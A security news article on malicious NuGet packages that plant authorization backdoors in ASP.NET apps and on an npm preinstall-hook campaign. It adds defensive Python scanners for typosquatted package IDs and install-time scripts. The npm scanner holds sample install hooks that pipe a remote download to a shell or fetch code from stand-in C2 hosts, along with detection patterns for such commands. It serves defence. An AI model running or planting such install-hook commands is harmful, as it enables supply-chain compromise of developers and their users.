Malicious NuGet Packages Target ASP.NET Developers to Deploy Backdoors, Exfiltrate Data

Cybersecurity researchers have uncovered a series of malicious NuGet packages specifically designed to target ASP.NET web application developers, aiming to exfiltrate sensitive data and establish persistent backdoors within affected applications.

The campaign, identified by the security firm Socket, involves four distinct packages:

– NCryptYo
– DOMOAuth2_
– IRAOAuth2.0
– SimpleWriter_

These packages were uploaded to the NuGet repository between August 12 and 21, 2024, by a user named hamzazaheer. Before their removal following responsible disclosure, they had been downloaded over 4,500 times.

Technical Breakdown of the Malicious Packages:

1. NCryptYo: Serving as the initial stage dropper, NCryptYo establishes a local proxy on `localhost:7152`, which relays traffic to an attacker-controlled command-and-control (C2) server. The address of this C2 server is dynamically retrieved at runtime. Notably, NCryptYo attempts to masquerade as the legitimate NCrypto package, adding a layer of deception.

2. DOMOAuth2_ and IRAOAuth2.0: These packages are engineered to steal ASP.NET Identity data, including user accounts, role assignments, and permission mappings. They also manipulate authorization rules to create persistent backdoors within the compromised applications.

3. SimpleWriter_: Disguised as a PDF conversion utility, SimpleWriter_ possesses capabilities for unconditional file writing and hidden process execution, further compromising the integrity of the affected systems.

An analysis of the package metadata revealed identical build environments, suggesting that a single threat actor orchestrated this campaign.
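The NCryptYo-for-NCrypto imitation and the trailing-underscore package names above are exactly what a pre-merge dependency check can catch. The following is an added example, not code from Socket or from the article: it parses the PackageReference entries of a .csproj, flags the four reported package IDs outright, and compares every other unvetted ID against an allow-list of already-reviewed packages using difflib. The sample project file, the allow-list and the 0.8 similarity cutoff are constructed assumptions for illustration.

```python
"""Audit the PackageReference entries of a .csproj for the package IDs named
in the Socket report and for look-alike IDs of vetted packages (NCryptYo
imitating NCrypto is the pattern). Added example; the .csproj, the vetted
allow-list and the similarity cutoff are constructed, not from the report."""
import difflib
import re
import xml.etree.ElementTree as ET

# Package IDs the article reports as malicious.
REPORTED_MALICIOUS = {"NCryptYo", "DOMOAuth2_", "IRAOAuth2.0", "SimpleWriter_"}

# Constructed allow-list of package IDs the team has already vetted.
# In practice this comes from a curated private feed or a reviewed lock file.
KNOWN_GOOD = {
    "NCrypto",
    "Microsoft.AspNetCore.Identity.EntityFrameworkCore",
    "Newtonsoft.Json",
    "Serilog",
}

# IDs ending in a stray underscore/hyphen or a version-like "2.0" are a cheap
# way to squat a familiar name; two of the reported packages do exactly this.
SUSPICIOUS_SUFFIX = re.compile(r"[_\-]$|\d+\.\d+$")

# Constructed sample project file (SDK-style, so no XML namespace).
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk.Web">
  <ItemGroup>
    <PackageReference Include="NCryptYo" Version="1.0.3" />
    <PackageReference Include="Serilog" Version="3.1.1" />
    <PackageReference Include="Newtonsoft.Jsom" Version="13.0.3" />
    <PackageReference Include="PdfTools_" Version="0.9.0" />
    <PackageReference Include="Microsoft.AspNetCore.Identity.EntityFrameworkCore" Version="8.0.0" />
  </ItemGroup>
</Project>"""


def package_ids(csproj_xml: str) -> list[str]:
    """Return every PackageReference Include= value, ignoring any XML namespace
    (legacy .csproj files declare one; SDK-style files do not)."""
    root = ET.fromstring(csproj_xml)
    ids = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "PackageReference" and "Include" in el.attrib:
            ids.append(el.attrib["Include"])
    return ids


def audit_csproj(csproj_xml: str, known_good=KNOWN_GOOD, cutoff: float = 0.8) -> dict[str, str]:
    """Map each package ID that needs review to the reason it was flagged.
    IDs that exactly match the allow-list are accepted silently."""
    lower_to_id = {k.lower(): k for k in known_good}
    findings = {}
    for pid in package_ids(csproj_xml):
        if pid in REPORTED_MALICIOUS:
            findings[pid] = "reported-malicious"
        elif pid in known_good:
            continue
        else:
            # Case-insensitive near match against vetted IDs catches one-letter
            # edits and appended characters (NCryptYo vs NCrypto).
            near = difflib.get_close_matches(pid.lower(), list(lower_to_id), n=1, cutoff=cutoff)
            if near:
                findings[pid] = f"lookalike of {lower_to_id[near[0]]}"
            elif SUSPICIOUS_SUFFIX.search(pid):
                findings[pid] = "suspicious-suffix"
            else:
                findings[pid] = "unvetted"
    return findings


if __name__ == "__main__":
    for pkg, reason in audit_csproj(SAMPLE_CSPROJ).items():
        print(f"{pkg:55} {reason}")
```

Run against the sample, the check reports NCryptYo as reported-malicious, Newtonsoft.Jsom as a look-alike of Newtonsoft.Json and PdfTools_ for its suffix, while the two vetted packages pass. The allow-list comparison is the part worth keeping: a name that is merely unfamiliar warrants a look at the publisher's history on NuGet, but a name that is one edit away from a package you already use is a typosquat until proven otherwise.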

Operational Mechanism:

Upon installation, NCryptYo’s static constructor installs Just-In-Time (JIT) compiler hooks that decrypt embedded payloads and deploy a secondary binary—a localhost proxy on port 7152. This proxy facilitates communication between the companion packages and the attacker’s external C2 server, whose address is resolved dynamically at runtime.

Once the proxy is active, DOMOAuth2_ and IRAOAuth2.0 begin transmitting the ASP.NET Identity data through the local proxy to the external infrastructure. The C2 server responds with authorization rules that the application then applies, creating a persistent backdoor: the attacker can grant their own accounts admin roles, modify access controls, or disable security checks. SimpleWriter_, for its part, writes threat actor-controlled content to disk and executes the dropped binary with hidden windows.

The primary objective of this campaign is not to compromise the developer’s machine directly but to infiltrate the applications they build. By controlling the authorization layer during development, the threat actor gains access to deployed production applications. When the victim deploys their ASP.NET application with the malicious dependencies, the C2 infrastructure remains active in production, continuously exfiltrating permission data and accepting modified authorization rules. The threat actor or a buyer can then grant themselves admin-level access to any deployed instance.

Broader Implications:

This disclosure coincides with Tenable's report on a malicious npm package named ambar-src, which amassed over 50,000 downloads before its removal from the JavaScript registry. Uploaded on February 13, 2026, the package abused npm's preinstall lifecycle hook, which runs automatically during `npm install`, to execute malicious code at install time. The hook ran a one-liner that fetched a different payload from the domain x-ya[.]ru depending on the operating system:

– Windows: Downloaded and executed a file named `msinit.exe` containing encrypted shellcode, which was decoded and loaded into memory.

– Linux: Fetched a bash script and executed it. The bash script then retrieved another payload from the same server, an ELF binary that functioned as an SSH-based reverse shell client.

– macOS: Fetched another script that used `osascript` to run JavaScript responsible for dropping Apfell, a JavaScript for Automation (JXA) agent part of the Mythic C2 framework. This agent could conduct reconnaissance, collect screenshots, steal data from Google Chrome, and capture system passwords by displaying a fake prompt.
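The preinstall hook is the mechanism to audit here: npm runs it during `npm install`, so whatever command it contains executes before the developer has read a line of the package. The following is an added example, not Tenable's code: it scans a set of package.json manifests for install-time hooks whose commands fetch and run remote content (download piped to a shell, osascript, PowerShell download cradles, inline node eval, bare URLs) and includes a loader for a real node_modules tree. The manifests, package names, URLs and commands are constructed and do not reproduce the actual ambar-src command.

```python
"""Flag npm packages whose install-time lifecycle scripts fetch and execute
remote content, the technique ambar-src used via its preinstall hook.
Added example, not code from Tenable's report. The manifests, package names
and commands below are constructed; none reproduce the real payload."""
import json
import os
import re

# npm runs these hooks automatically as part of `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Fetch-and-run indicators: (compiled pattern, label). Heuristic by design.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"), "download piped to shell"),
    (re.compile(r"\bosascript\b"), "osascript (macOS) execution"),
    (re.compile(r"powershell|pwsh|Invoke-Expression|\biex\b|\birm\b|DownloadString", re.I),
     "PowerShell download-and-run"),
    (re.compile(r"\bnode\s+(-e|--eval)\b"), "inline node eval"),
    (re.compile(r"https?://\S+"), "remote URL"),
]

# Constructed node_modules snapshot: package name -> parsed package.json.
SAMPLE_MANIFESTS = {
    "evil-pkg": {
        "name": "evil-pkg",
        "version": "1.0.0",
        "scripts": {"preinstall": "curl -fsSL http://payload.example.invalid/i.sh | sh"},
    },
    "native-addon": {
        # Legitimate native build step: runs at install time but fetches nothing.
        "name": "native-addon",
        "version": "2.3.1",
        "scripts": {"install": "node-gyp rebuild"},
    },
    "sneaky-dl": {
        "name": "sneaky-dl",
        "version": "0.0.4",
        "scripts": {"postinstall": "node -e \"require('https').get('https://c2.example.invalid/p.js', r => r.pipe(process.stdout))\""},
    },
    "plain-lib": {"name": "plain-lib", "version": "4.0.0", "scripts": {"test": "jest"}},
}


def inspect_scripts(manifest: dict) -> dict[str, list[str]]:
    """Return {hook: [labels]} for each install hook whose command matches an indicator."""
    hits = {}
    for hook in INSTALL_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if not cmd:
            continue
        labels = [label for pattern, label in INDICATORS if pattern.search(cmd)]
        if labels:
            hits[hook] = labels
    return hits


def audit_manifests(manifests: dict) -> dict[str, dict[str, list[str]]]:
    """Run inspect_scripts over a name -> manifest mapping, keeping only packages with hits."""
    return {name: hits for name, m in manifests.items() if (hits := inspect_scripts(m))}


def load_node_modules(root: str) -> dict:
    """Walk a real node_modules tree and collect every package.json, so the
    audit can run on an installed project instead of the constructed sample."""
    manifests = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                m = json.load(fh)
        except (OSError, ValueError):
            continue
        manifests[m.get("name", os.path.relpath(dirpath, root))] = m
    return manifests


if __name__ == "__main__":
    for pkg, hooks in audit_manifests(SAMPLE_MANIFESTS).items():
        for hook, labels in hooks.items():
            print(f"{pkg}: {hook} -> {', '.join(labels)}")
```

On the sample, evil-pkg and sneaky-dl are reported and the native-addon build step is not, which is the distinction that matters: install hooks are legitimate for native modules, so the signal is remote fetch plus execution, not the presence of a hook. The scan is a heuristic; a package can keep its hook innocuous and put the fetch in a required script instead. The stronger control is to install with `npm install --ignore-scripts` (or set `ignore-scripts=true` in .npmrc) and re-enable scripts only for packages known to need them.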

This campaign underscores the growing sophistication of supply chain attacks against open-source ecosystems. The practical defenses follow from the techniques used here: treat any new dependency as untrusted code that runs at install, build and run time; check a package's publisher history and compare its name against the legitimate package it resembles before adding it; pin versions with lock files and prefer a curated internal feed; disable automatic install scripts unless a package is known to need them; and monitor build hosts and deployed applications for anomalous network traffic, including unexpected local listeners such as the port 7152 proxy described above. Regular dependency audits catch what the first review missed.